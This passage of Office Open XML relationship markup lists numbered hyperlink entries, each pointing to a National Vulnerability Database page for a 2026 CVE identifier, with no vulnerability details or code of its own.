Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship 